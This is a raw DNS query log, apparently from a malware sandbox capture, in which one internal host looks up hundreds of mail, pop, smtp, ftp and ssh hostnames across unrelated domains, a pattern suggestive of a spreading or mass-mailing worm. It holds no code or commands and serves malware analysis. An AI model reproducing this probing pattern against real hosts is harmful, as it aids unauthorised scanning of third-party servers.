Dec 22, 2023 21:14:50.840194941 CET	192.168.2.4	1.1.1.1	0x84eb	Standard query (0)	mx.b.locaweb.com.br	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.843113899 CET	192.168.2.4	1.1.1.1	0xf079	Standard query (0)	pop3.maroonshockey.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.844527006 CET	192.168.2.4	1.1.1.1	0x4f68	Standard query (0)	ASPMX.daum.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.844527006 CET	192.168.2.4	1.1.1.1	0x382f	Standard query (0)	mail.omuramba.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.844527006 CET	192.168.2.4	1.1.1.1	0x8d63	Standard query (0)	zonemx.eu	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956442118 CET	192.168.2.4	1.1.1.1	0x40b4	Standard query (0)	yandfcorp-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956496954 CET	192.168.2.4	1.1.1.1	0xe99f	Standard query (0)	mail.easlab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956497908 CET	192.168.2.4	1.1.1.1	0x7712	Standard query (0)	pop.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956497908 CET	192.168.2.4	1.1.1.1	0x97d3	Standard query (0)	ftp.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956518888 CET	192.168.2.4	1.1.1.1	0x643d	Standard query (0)	mail.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956592083 CET	192.168.2.4	1.1.1.1	0x1e6a	Standard query (0)	mail.eddc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956651926 CET	192.168.2.4	1.1.1.1	0xc890	Standard query (0)	mail.customintegrated.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956651926 CET	192.168.2.4	1.1.1.1	0xe5c3	Standard query (0)	distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956651926 CET	192.168.2.4	1.1.1.1	0xcc57	Standard query (0)	pop3.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956696033 CET	192.168.2.4	1.1.1.1	0xd2f5	Standard query (0)	ssh.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956696033 CET	192.168.2.4	1.1.1.1	0xb6c4	Standard query (0)	davescheirer-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956777096 CET	192.168.2.4	1.1.1.1	0x8c4e	Standard query (0)	mail.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956777096 CET	192.168.2.4	1.1.1.1	0xe35d	Standard query (0)	mx.coxmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956829071 CET	192.168.2.4	1.1.1.1	0x3117	Standard query (0)	mail.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956829071 CET	192.168.2.4	1.1.1.1	0x578e	Standard query (0)	bldowney.com.1.0001.arsmtp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956897020 CET	192.168.2.4	1.1.1.1	0x4779	Standard query (0)	ssh.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956897020 CET	192.168.2.4	1.1.1.1	0x3d68	Standard query (0)	smtp.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956897020 CET	192.168.2.4	1.1.1.1	0x9902	Standard query (0)	mx.avasin.plus.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956967115 CET	192.168.2.4	1.1.1.1	0x138a	Standard query (0)	imap.eddc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956967115 CET	192.168.2.4	1.1.1.1	0x78c4	Standard query (0)	mailgate.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.956984997 CET	192.168.2.4	1.1.1.1	0x4e74	Standard query (0)	mx.enricobassi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.957856894 CET	192.168.2.4	1.1.1.1	0xca6d	Standard query (0)	mx01.mailcluster.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.964589119 CET	192.168.2.4	1.1.1.1	0x72d3	Standard query (0)	covicol-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.968585968 CET	192.168.2.4	1.1.1.1	0xbba1	Standard query (0)	mx1.massnegocios.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.968585968 CET	192.168.2.4	1.1.1.1	0x5d24	Standard query (0)	aspmx2.googlemail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.968844891 CET	192.168.2.4	1.1.1.1	0xa762	Standard query (0)	mail.oljud.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.970078945 CET	192.168.2.4	1.1.1.1	0x2d39	Standard query (0)	us-smtp-inbound-1.mimecast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.970202923 CET	192.168.2.4	1.1.1.1	0x3ca2	Standard query (0)	racesystems-com-au.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.032083988 CET	192.168.2.4	1.1.1.1	0x4e92	Standard query (0)	mail.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.032128096 CET	192.168.2.4	1.1.1.1	0x8d63	Standard query (0)	zonemx.eu	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.032128096 CET	192.168.2.4	1.1.1.1	0x382f	Standard query (0)	mail.omuramba.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.032128096 CET	192.168.2.4	1.1.1.1	0xf079	Standard query (0)	pop3.maroonshockey.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.032151937 CET	192.168.2.4	1.1.1.1	0x4f68	Standard query (0)	ASPMX.daum.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.063215017 CET	192.168.2.4	1.1.1.1	0x14a4	Standard query (0)	caribbean360-com.p30.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.063488007 CET	192.168.2.4	1.1.1.1	0x6827	Standard query (0)	mail.adm-works.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.063936949 CET	192.168.2.4	1.1.1.1	0x2d23	Standard query (0)	mx003.netsol.xion.oxcs.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.064450979 CET	192.168.2.4	1.1.1.1	0x5fad	Standard query (0)	inbound-reply.s7.exacttarget.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.064739943 CET	192.168.2.4	1.1.1.1	0x5596	Standard query (0)	fb.mail.gandi.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.065524101 CET	192.168.2.4	1.1.1.1	0x93d	Standard query (0)	mail4.stememail.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.098871946 CET	192.168.2.4	1.1.1.1	0xca2b	Standard query (0)	alt4.aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.103501081 CET	192.168.2.4	1.1.1.1	0xdf68	Standard query (0)	lpl-org.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.103979111 CET	192.168.2.4	1.1.1.1	0xca6d	Standard query (0)	mx01.mailcluster.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.105422020 CET	192.168.2.4	1.1.1.1	0x419b	Standard query (0)	irelandventures-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.105993032 CET	192.168.2.4	1.1.1.1	0x2d1a	Standard query (0)	smtpv2.ec2.33mail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.107507944 CET	192.168.2.4	1.1.1.1	0xc13c	Standard query (0)	viruswall.tvs-e.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.125610113 CET	192.168.2.4	1.1.1.1	0x3ca2	Standard query (0)	racesystems-com-au.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.125610113 CET	192.168.2.4	1.1.1.1	0xbba1	Standard query (0)	mx1.massnegocios.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.125627041 CET	192.168.2.4	1.1.1.1	0x72d3	Standard query (0)	covicol-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.125817060 CET	192.168.2.4	1.1.1.1	0xa762	Standard query (0)	mail.oljud.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.126496077 CET	192.168.2.4	1.1.1.1	0x2f0e	Standard query (0)	ftp.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.128635883 CET	192.168.2.4	1.1.1.1	0x409d	Standard query (0)	ftp.demarillac.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.129461050 CET	192.168.2.4	1.1.1.1	0x9a5c	Standard query (0)	ftp.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.129944086 CET	192.168.2.4	1.1.1.1	0xc9b6	Standard query (0)	ftp.necalin.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.130487919 CET	192.168.2.4	1.1.1.1	0xb5f4	Standard query (0)	ssh.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.130954027 CET	192.168.2.4	1.1.1.1	0x43ed	Standard query (0)	ssh.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.154867887 CET	192.168.2.4	1.1.1.1	0x1f1e	Standard query (0)	ftp.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.155090094 CET	192.168.2.4	1.1.1.1	0x169c	Standard query (0)	ssh.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.165371895 CET	192.168.2.4	1.1.1.1	0x743f	Standard query (0)	ssh.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.165816069 CET	192.168.2.4	1.1.1.1	0xfbbf	Standard query (0)	mail.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.166568995 CET	192.168.2.4	1.1.1.1	0x59bc	Standard query (0)	mail.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.425802946 CET	192.168.2.4	1.1.1.1	0x5596	Standard query (0)	fb.mail.gandi.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.425848007 CET	192.168.2.4	1.1.1.1	0x14a4	Standard query (0)	caribbean360-com.p30.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.425918102 CET	192.168.2.4	1.1.1.1	0xaf12	Standard query (0)	distraction.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426012039 CET	192.168.2.4	1.1.1.1	0x419b	Standard query (0)	irelandventures-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426012039 CET	192.168.2.4	1.1.1.1	0xdf68	Standard query (0)	lpl-org.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426052094 CET	192.168.2.4	1.1.1.1	0x2d1a	Standard query (0)	smtpv2.ec2.33mail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426130056 CET	192.168.2.4	1.1.1.1	0x43ed	Standard query (0)	ssh.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426182985 CET	192.168.2.4	1.1.1.1	0xc9b6	Standard query (0)	ftp.necalin.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426182985 CET	192.168.2.4	1.1.1.1	0xb5f4	Standard query (0)	ssh.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426220894 CET	192.168.2.4	1.1.1.1	0x409d	Standard query (0)	ftp.demarillac.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426220894 CET	192.168.2.4	1.1.1.1	0x9a5c	Standard query (0)	ftp.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426256895 CET	192.168.2.4	1.1.1.1	0x2f0e	Standard query (0)	ftp.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426294088 CET	192.168.2.4	1.1.1.1	0x169c	Standard query (0)	ssh.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426295042 CET	192.168.2.4	1.1.1.1	0x1f1e	Standard query (0)	ftp.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426311016 CET	192.168.2.4	1.1.1.1	0x59bc	Standard query (0)	mail.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426515102 CET	192.168.2.4	1.1.1.1	0xfbbf	Standard query (0)	mail.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.426554918 CET	192.168.2.4	1.1.1.1	0x743f	Standard query (0)	ssh.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.497248888 CET	192.168.2.4	1.1.1.1	0xaa70	Standard query (0)	jaydien-com.mx1.arsmtp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.497457027 CET	192.168.2.4	1.1.1.1	0x71bc	Standard query (0)	p3m1.ns360.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.501131058 CET	192.168.2.4	1.1.1.1	0xb049	Standard query (0)	ftp.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.505587101 CET	192.168.2.4	1.1.1.1	0xe575	Standard query (0)	mail.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.537389040 CET	192.168.2.4	1.1.1.1	0x6d0b	Standard query (0)	www.hugedomains.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.547749996 CET	192.168.2.4	1.1.1.1	0x54d	Standard query (0)	www.org.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.749115944 CET	192.168.2.4	1.1.1.1	0xe575	Standard query (0)	mail.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.749181986 CET	192.168.2.4	1.1.1.1	0x71bc	Standard query (0)	p3m1.ns360.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.750525951 CET	192.168.2.4	1.1.1.1	0xeff7	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.751250982 CET	192.168.2.4	1.1.1.1	0xadec	Standard query (0)	mail.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.953156948 CET	192.168.2.4	1.1.1.1	0xadec	Standard query (0)	mail.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.953210115 CET	192.168.2.4	1.1.1.1	0xeff7	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.973973989 CET	192.168.2.4	1.1.1.1	0x7906	Standard query (0)	ftp.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:51.974611044 CET	192.168.2.4	1.1.1.1	0x5f8f	Standard query (0)	ssh.necalin.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.157566071 CET	192.168.2.4	1.1.1.1	0x7906	Standard query (0)	ftp.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.160680056 CET	192.168.2.4	1.1.1.1	0xf7eb	Standard query (0)	www.liberty25.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.172188044 CET	192.168.2.4	1.1.1.1	0xcd9d	Standard query (0)	ssh.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.223251104 CET	192.168.2.4	1.1.1.1	0x9704	Standard query (0)	www.thenile.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.230195999 CET	192.168.2.4	1.1.1.1	0xa7f3	Standard query (0)	smtp.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.230976105 CET	192.168.2.4	1.1.1.1	0x57fb	Standard query (0)	sites.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.234375000 CET	192.168.2.4	1.1.1.1	0xc470	Standard query (0)	www.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.252882004 CET	192.168.2.4	1.1.1.1	0x70d	Standard query (0)	mail.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.255343914 CET	192.168.2.4	1.1.1.1	0xa249	Standard query (0)	pop.yandfcorp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.258728981 CET	192.168.2.4	1.1.1.1	0xadec	Standard query (0)	www.adelaideclub.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.295420885 CET	192.168.2.4	1.1.1.1	0x305c	Standard query (0)	www.coupons2grab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.297127962 CET	192.168.2.4	1.1.1.1	0xbad4	Standard query (0)	caribbean360-com.p40.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.299978971 CET	192.168.2.4	1.1.1.1	0x17f2	Standard query (0)	www.fotoestudiomiret.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.300184965 CET	192.168.2.4	1.1.1.1	0xd057	Standard query (0)	www.aikya.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.305192947 CET	192.168.2.4	1.1.1.1	0xf7eb	Standard query (0)	www.liberty25.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.310159922 CET	192.168.2.4	1.1.1.1	0x35ea	Standard query (0)	www.enricobassi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.311064005 CET	192.168.2.4	1.1.1.1	0x7b56	Standard query (0)	www.covicol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.312521935 CET	192.168.2.4	1.1.1.1	0xcf48	Standard query (0)	www.conquestaccounting.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.317913055 CET	192.168.2.4	1.1.1.1	0x6f22	Standard query (0)	trivandrum.german.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.320223093 CET	192.168.2.4	1.1.1.1	0xcd9d	Standard query (0)	ssh.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.627484083 CET	192.168.2.4	1.1.1.1	0xd057	Standard query (0)	www.aikya.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.627557039 CET	192.168.2.4	1.1.1.1	0x305c	Standard query (0)	www.coupons2grab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.627613068 CET	192.168.2.4	1.1.1.1	0xcf48	Standard query (0)	www.conquestaccounting.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.627655983 CET	192.168.2.4	1.1.1.1	0x7b56	Standard query (0)	www.covicol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.627655983 CET	192.168.2.4	1.1.1.1	0x35ea	Standard query (0)	www.enricobassi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.636637926 CET	192.168.2.4	1.1.1.1	0x4a39	Standard query (0)	mailgate.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.639360905 CET	192.168.2.4	1.1.1.1	0x6b4f	Standard query (0)	mailgate.maroonshockey.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.640510082 CET	192.168.2.4	1.1.1.1	0xbf6e	Standard query (0)	pop.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.812092066 CET	192.168.2.4	1.1.1.1	0x4a39	Standard query (0)	mailgate.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.852623940 CET	192.168.2.4	1.1.1.1	0x820	Standard query (0)	ftp.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.852623940 CET	192.168.2.4	1.1.1.1	0xda7c	Standard query (0)	ftp.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.871705055 CET	192.168.2.4	1.1.1.1	0xd613	Standard query (0)	ssh.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.875252962 CET	192.168.2.4	1.1.1.1	0x9ad	Standard query (0)	ftp.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.878273964 CET	192.168.2.4	1.1.1.1	0x41a0	Standard query (0)	ftp.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.884423971 CET	192.168.2.4	1.1.1.1	0xe07a	Standard query (0)	ww1.dl-it.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.888516903 CET	192.168.2.4	1.1.1.1	0xd086	Standard query (0)	ftp.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.889280081 CET	192.168.2.4	1.1.1.1	0x458f	Standard query (0)	ftp.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.889280081 CET	192.168.2.4	1.1.1.1	0xa73b	Standard query (0)	mail.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.890006065 CET	192.168.2.4	1.1.1.1	0xf17d	Standard query (0)	ftp.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.890393972 CET	192.168.2.4	1.1.1.1	0x7681	Standard query (0)	ftp.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.890742064 CET	192.168.2.4	1.1.1.1	0x4aca	Standard query (0)	ftp.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.892539024 CET	192.168.2.4	1.1.1.1	0xdff1	Standard query (0)	ftp.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.893563032 CET	192.168.2.4	1.1.1.1	0xa576	Standard query (0)	mail.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.894177914 CET	192.168.2.4	1.1.1.1	0x4a21	Standard query (0)	ftp.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.895085096 CET	192.168.2.4	1.1.1.1	0x8fb2	Standard query (0)	mail.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.897197962 CET	192.168.2.4	1.1.1.1	0xbe8	Standard query (0)	mail.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.898919106 CET	192.168.2.4	1.1.1.1	0x8078	Standard query (0)	mail.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.899461985 CET	192.168.2.4	1.1.1.1	0x925d	Standard query (0)	mail.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.900177002 CET	192.168.2.4	1.1.1.1	0x34df	Standard query (0)	ftp.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.900693893 CET	192.168.2.4	1.1.1.1	0x489d	Standard query (0)	ftp.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.901035070 CET	192.168.2.4	1.1.1.1	0xc1a6	Standard query (0)	mail.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.901695013 CET	192.168.2.4	1.1.1.1	0xbed6	Standard query (0)	ftp.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.902589083 CET	192.168.2.4	1.1.1.1	0x704b	Standard query (0)	mail.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.903301954 CET	192.168.2.4	1.1.1.1	0xcd41	Standard query (0)	ftp.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.906080008 CET	192.168.2.4	1.1.1.1	0x3437	Standard query (0)	mail.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.906315088 CET	192.168.2.4	1.1.1.1	0xf5fc	Standard query (0)	mail.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.908444881 CET	192.168.2.4	1.1.1.1	0xdb33	Standard query (0)	ftp.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.983637094 CET	192.168.2.4	1.1.1.1	0xadec	Standard query (0)	mail.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.984462023 CET	192.168.2.4	1.1.1.1	0x1f40	Standard query (0)	mail.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.985121965 CET	192.168.2.4	1.1.1.1	0x7084	Standard query (0)	mail.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.985867977 CET	192.168.2.4	1.1.1.1	0x8c40	Standard query (0)	ftp.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.986121893 CET	192.168.2.4	1.1.1.1	0x543	Standard query (0)	pop.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.986341000 CET	192.168.2.4	1.1.1.1	0x8640	Standard query (0)	ftp.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.987906933 CET	192.168.2.4	1.1.1.1	0x78f7	Standard query (0)	mailgate.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.988759041 CET	192.168.2.4	1.1.1.1	0x9567	Standard query (0)	ftp.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.989176989 CET	192.168.2.4	1.1.1.1	0x8d84	Standard query (0)	mail.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.989783049 CET	192.168.2.4	1.1.1.1	0x1a55	Standard query (0)	mail.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:52.990518093 CET	192.168.2.4	1.1.1.1	0xc357	Standard query (0)	ftp.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.015908003 CET	192.168.2.4	1.1.1.1	0x5997	Standard query (0)	ftp.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.016957045 CET	192.168.2.4	1.1.1.1	0xee5c	Standard query (0)	ssh.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.018965006 CET	192.168.2.4	1.1.1.1	0xa60c	Standard query (0)	ftp.asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.020462990 CET	192.168.2.4	1.1.1.1	0xdeb7	Standard query (0)	ftp.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.020736933 CET	192.168.2.4	1.1.1.1	0x34a2	Standard query (0)	ftp.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.021119118 CET	192.168.2.4	1.1.1.1	0x47f5	Standard query (0)	mail.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.021553040 CET	192.168.2.4	1.1.1.1	0x4913	Standard query (0)	mail.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.025053978 CET	192.168.2.4	1.1.1.1	0x78ba	Standard query (0)	ftp.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.031368017 CET	192.168.2.4	1.1.1.1	0x41a0	Standard query (0)	ftp.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.031599998 CET	192.168.2.4	1.1.1.1	0x9ad	Standard query (0)	ftp.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.031677961 CET	192.168.2.4	1.1.1.1	0xd613	Standard query (0)	ssh.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.031929016 CET	192.168.2.4	1.1.1.1	0x1ef6	Standard query (0)	pop.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.035253048 CET	192.168.2.4	1.1.1.1	0xd348	Standard query (0)	ftp.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:53.035284042 CET	192.168.2.4	1.1.1.1	0x7081	Standard query (0)	ftp.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
